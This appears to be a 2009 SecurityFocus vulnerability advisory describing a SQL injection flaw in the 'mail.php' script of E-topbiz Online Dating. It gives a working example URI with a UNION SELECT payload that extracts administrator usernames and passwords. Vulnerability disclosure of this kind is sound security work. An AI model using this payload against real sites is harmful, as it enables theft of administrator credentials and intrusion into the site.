Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

E-topbiz Online Dating 'mail.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*







 

Privacy Statement
Copyright 2009, SecurityFocus